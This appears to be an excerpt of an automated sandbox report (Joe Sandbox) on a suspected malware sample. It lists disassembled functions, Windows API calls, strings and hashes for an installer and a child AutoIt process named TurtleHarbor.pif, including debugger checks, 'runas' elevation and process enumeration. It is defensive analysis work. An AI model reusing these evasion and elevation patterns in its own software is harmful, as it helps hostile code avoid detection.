CreateDialogParamW.USER32(0000006F,00000000,00402DB4,00000000), ref: 00402E88
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004035D7,?), ref: 00402E96

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
Instruction ID: c637284af2d6cdf60ec22d353f69018081d624b8e4296ea034bdf55e3067f771
Opcode Fuzzy Hash: c46447e93630878450969176786434de847f14ddf39dd8d972ff8c80f950fc89
Instruction Fuzzy Hash: 89F05E30541A21EBC6616B20FE0CAAB7B64FB04B51B4008BFF945B11E4CB7448938BDD

Function 00405C29 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,00000000,00000000,0040219A,00000000,?), ref: 00405C34
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000), ref: 00405C4A
GetProcAddress.KERNEL32(?,00000000), ref: 00405C59
GlobalFree.KERNEL32(00000000), ref: 00405C62

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
Instruction ID: e1c5d748dd31bcb7ed763deea17071bf78cda9c2e5a8ae371288e20c28570659
Opcode Fuzzy Hash: 7b8b1b869dc425c4e8d1decedcc15e3ea1801fb9e202fffad77dd5e1c54a2680
Instruction Fuzzy Hash: 00E092312001107BE2201B269E8CD6B7EACDFCA7B6B04013AF685E11A0CA308C11C678

Function 004043CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404403
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404471

Part of subcall function 00403937: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403949

Strings

, xrefs: 004043DB

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
Instruction ID: 950938491bfceb2c9a9aaf13ad46a3c9d7f26d5a45bb245acca2c437b02a68c6
Opcode Fuzzy Hash: 9fdaa817c79f8fe2df8c01310cb7398ca4e4993dd3d52cefc4da2c44810d4525
Instruction Fuzzy Hash: 52119EB1500228EBDF11AF91DD80E9B3729AF84325F00803BFB09751A2C77D89519FAA

Function 0040243C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,00002003,00000000), ref: 00402478
lstrcmpW.KERNEL32(?,?,?,00002003,00000000), ref: 00402483

Strings

!N~, xrefs: 0040243C

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
Instruction ID: 97e2760095c772b904354d470d60f9b26315119a41df21907abd1c807f0e2d98
Opcode Fuzzy Hash: fc1006ea5aab162bbc40b6df3c94a123494fc128051bda68380e80ee4f4a212d
Instruction Fuzzy Hash: 5CF01275900214ABDB00BFA8DD859AE3BBCAB08300B00412EF601F71A2D67449019B94

Function 004056EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0045FDD0,Error launching installer), ref: 00405711
CloseHandle.KERNEL32(?), ref: 0040571E

Strings

Error launching installer, xrefs: 004056F5

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
Instruction ID: 53ccf60803aa8836d7366e45e4d019fb0888d0b7e4ffe46943b31cf4c1d238f5
Opcode Fuzzy Hash: 8a3581b750d29c0f06103fe1997c215cccf07df72e665a86a296c08cae4d825b
Instruction Fuzzy Hash: A6E0EC70500209BBEB009B64EE49D7B7BBCEB44345F404436AD51E2151D774D81C9A69

Function 0040380B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",00000000,00000002,00403408,00403659,?), ref: 00403825
GlobalFree.KERNEL32(?), ref: 0040382C

Strings

"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 0040381D

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"
API String ID: 1100898210-2569130941
Opcode ID: 4a5d30e53fa382e4b96b03fdcaf489e0a6c6a57c18e3521b9229a08418a18d03
Instruction ID: 797a915ab75ef0c1bf1afe469447d8e6374deb4cd26acbfe71ab078a021f9c63
Opcode Fuzzy Hash: 4a5d30e53fa382e4b96b03fdcaf489e0a6c6a57c18e3521b9229a08418a18d03
Instruction Fuzzy Hash: 1BE012338011209BC6216F15EA0875E7B68AF89BB2F15407AF9C17B3608B745C8286D8

Function 00406015 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403187,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 0040601B
CharPrevW.USER32(80000000,00000000,?,?,?,00000000,004035D7,?), ref: 0040602C

Strings

C:\Users\user\Desktop, xrefs: 00406015

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 2a10590b686a86e8fda5e7903cf5f10d7b8a4988a125ed22108b2cb02686b793
Instruction ID: 58838e2c89e91e20de5a8a6cd657b3c1cdd427daeb01acc5e3fb2bbd33223236
Opcode Fuzzy Hash: 2a10590b686a86e8fda5e7903cf5f10d7b8a4988a125ed22108b2cb02686b793
Instruction Fuzzy Hash: 5ED017710119219AC726AB18DA058AF77A8EF05340346446AE142E7164CB385C928BAD

Function 00405864 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
lstrcmpiA.KERNEL32(00000000,00406495), ref: 0040588C
CharNextA.USER32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 0040589D
lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
Instruction ID: 678e37072a379e1faffe29b6aa71237c6b28e2b3d53614aa4618b887c013b5be
Opcode Fuzzy Hash: cd19360c238f1349a786dd8267181da6a2629ba8d2dc02acca249f0761a9dd09
Instruction Fuzzy Hash: 2CF0C236501448EFE701AFA5CD00C9F7BA8EF46350B2580BAEC40F7311D634DE019BA8

Analysis Process: TurtleHarbor.pifPID: 7732, Parent PID: 7692COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	118

Executed Functions

Function 00325240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0032526C
IsDebuggerPresent.KERNEL32 ref: 0032527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 003252E6

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Part of subcall function 0031BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0031BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00325366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00360B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00360B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003C6D10), ref: 00360BE9
ShellExecuteW.SHELL32(00000000), ref: 00360BF0

Part of subcall function 0032514C: GetSysColorBrush.USER32(0000000F), ref: 00325156
Part of subcall function 0032514C: LoadCursorW.USER32(00000000,00007F00), ref: 00325165
Part of subcall function 0032514C: LoadIconW.USER32(00000063), ref: 0032517C
Part of subcall function 0032514C: LoadIconW.USER32(000000A4), ref: 0032518E
Part of subcall function 0032514C: LoadIconW.USER32(000000A2), ref: 003251A0
Part of subcall function 0032514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003251C6
Part of subcall function 0032514C: RegisterClassExW.USER32(?), ref: 0032521C

Part of subcall function 003250DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00325109
Part of subcall function 003250DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0032512A
Part of subcall function 003250DB: ShowWindow.USER32(00000000), ref: 0032513E
Part of subcall function 003250DB: ShowWindow.USER32(00000000), ref: 00325147

Part of subcall function 003259D3: _memset.LIBCMT ref: 003259F9
Part of subcall function 003259D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00325A9E

Strings

runas, xrefs: 00360BE4
AutoIt, xrefs: 00360B23
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00360B28

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: b5070c9bd8cad8e2909768aa2b036daaf0efccf8acae2aa4e4e249ab73fade8b
Instruction ID: f260e0ef7720da80b2601da27cca13b633afb6ea50df0261a14ed8661f2b430c
Opcode Fuzzy Hash: b5070c9bd8cad8e2909768aa2b036daaf0efccf8acae2aa4e4e249ab73fade8b
Instruction Fuzzy Hash: C9515C35945298AACF07FBB0FC06EFE7B7CAF19340F104456F551AA1A2DB705A45C721

Function 00325D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00325D40

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

GetCurrentProcess.KERNEL32(?,003A0A18,00000000,00000000,?), ref: 00325E07
IsWow64Process.KERNEL32(00000000), ref: 00325E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00325E54
FreeLibrary.KERNEL32(00000000), ref: 00325E5F
GetSystemInfo.KERNEL32(00000000), ref: 00325E90
GetSystemInfo.KERNEL32(00000000), ref: 00325E9C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: a8e6600f0d230e57305e20e9f122d8cbdbfc1b930a8aad14af9cc0ae3b62c0b0
Instruction ID: 8c7959953afc5059fe60496b4753489911f8378338afc706c8ac4095206d2327
Opcode Fuzzy Hash: a8e6600f0d230e57305e20e9f122d8cbdbfc1b930a8aad14af9cc0ae3b62c0b0
Instruction Fuzzy Hash: 7191B331549BD0DECB33CB68A4515EBFFE5AF3A300B894A5ED0C797A01D230A648C769

Function 00374148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0037416D
Process32FirstW.KERNEL32(00000000,?), ref: 0037417B
Process32NextW.KERNEL32(00000000,?), ref: 0037419B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00374245

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: ed87d4dadb0ccd12879f5173339c8e8449f6d3db4f98cd3b523b6cd967ea31bc
Instruction ID: f3fc8f70dda1c51f1bb39ebeccbc6572e3a7cdd35bd0d8f8f5472867275b016b
Opcode Fuzzy Hash: ed87d4dadb0ccd12879f5173339c8e8449f6d3db4f98cd3b523b6cd967ea31bc
Instruction Fuzzy Hash: 5731C5711083519FD316EF50E885AAFBBE8FFA5350F10092DF585C61A1EB70AA49CB92

Function 0031B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00323740: CharUpperBuffW.USER32(?,003D71DC,00000001,?,00000000,003D71DC,?,003153A5,?,?,?,?), ref: 0032375D

_memmove.LIBCMT ref: 0031B68A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: 14369fcbced130a19b7f88e48ea01c8870926076adecde11302613cafeceaf97
Instruction ID: 9d1c3062f0e73acb96a0a7e661c9e0a3dba207261c1f8f88dd1963497e5f2d8d
Opcode Fuzzy Hash: 14369fcbced130a19b7f88e48ea01c8870926076adecde11302613cafeceaf97
Instruction Fuzzy Hash: B9A29B746083418FC72ACF24C480BAAF7E5BF89344F15895DE89A8B761D770ED85CB92

Function 003194E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
